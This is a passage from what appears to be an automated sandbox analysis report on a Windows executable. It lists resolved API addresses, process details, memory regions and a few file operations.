| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x74f64a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x74f65fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x74f5a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x74f5c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x74f66300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x74f59a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x74f661b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x74f5fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77704f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x74f59a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x74f579b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x74f5fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x74f592b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x74f5a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x74f66180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x74f63a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x74f58cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x74f65f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74f52af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x74f578f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74f52db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74f52da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x74f57a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x74f5a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x74f59660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x74f5a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x74f5a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x74f587c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x74f58840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x74f57940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x74f59560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x74f669c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x74f66390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x74f81c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x74f668e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x74f66920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x74f66540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x776f5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x776f5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x74f826a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x776eda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x7770f190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x7770a200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x74f674f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x74f59fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x74f52d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x74f575a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74f525e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x74f66870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x74f668c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x74f66900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x74f59700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x74f51b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77712570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x74f57920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77709920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x74f662a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x74f66590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x74f66860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x74f59680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x74f664a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x74f5a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x74f828e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x74f5a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x74f66020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x74f577b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x74f5fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x74f59a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x74f51ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x74f51da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x74f59930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x74f5a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x74f58770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x74f5fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x74f59fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74f57910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x74f59a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x74f52dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74f51d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x74f52b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x74f5a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x74f5a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x776ebae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x74f664f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x7756ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x7756fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x775695e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x77570680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x7756ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x7756f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x7756ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x7756ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x7756f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x775706c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x7756efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x7756f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x766dc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x750dee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x750b55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x750b57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x750b9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x750b0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x750dfbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x76c838f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x76c9b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x76c9b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x76c87740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x76c974e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x76c9efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x76ca4ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x76c94580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x76c91540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x742f1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x742f1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x742f1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x74f5a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x74f5f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x74f57580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x74f59910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x74f66030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x74f65f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x74f65ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x74f5a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x74f5a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x776e40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x776dd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x776decf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x74f65720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x776de140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x776deb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77719990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77715540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77709dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74f5a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x74f80a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x752c0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x74f5f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x74f5fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x74f81030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x74f5a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x74f814b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x74f5a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x74f816f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x74f59970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x75243c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x74f58710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x74f596e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-23 14:13:04 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #210: qry2vco2.exe
175
0
| Information | Value |
|---|---|
| ID | #210 |
| File Name | c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe |
| Command Line | qRY2vco2.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:28, Reason: Child Process |
| Unmonitor | End Time: 00:03:34, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x5d8 |
| Parent PID | 0x9f0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C28
0x
73C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0031ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x00210fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x0031ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00320000 | 0x00349fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0036ffff | Private Memory | rw |
|
|
|
- |
| qry2vco2.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| locale.nls | 0x00480000 | 0x0053dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x0063ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x0080ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000640000 | 0x00640000 | 0x007c7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000800000 | 0x00800000 | 0x0080ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000810000 | 0x00810000 | 0x00990fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009a0000 | 0x009a0000 | 0x01d9ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001da0000 | 0x01da0000 | 0x01eeffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74220000 | 0x742b1fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x766d0000 | 0x7678dfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x77260000 | 0x772a3fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77300000 | 0x7738cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x74f40000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x77550000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x766d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75030000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x742f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x74f660c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x74f66110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x74f587e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x74f65f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x74f64a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x74f65fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x74f5a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x74f5c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x74f66300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x74f59a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x74f661b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x74f5fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77704f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x74f59a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x74f579b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x74f5fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x74f592b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x74f5a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x74f66180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x74f63a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x74f58cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x74f65f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74f52af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x74f578f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74f52db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74f52da0 |
|
1 | |
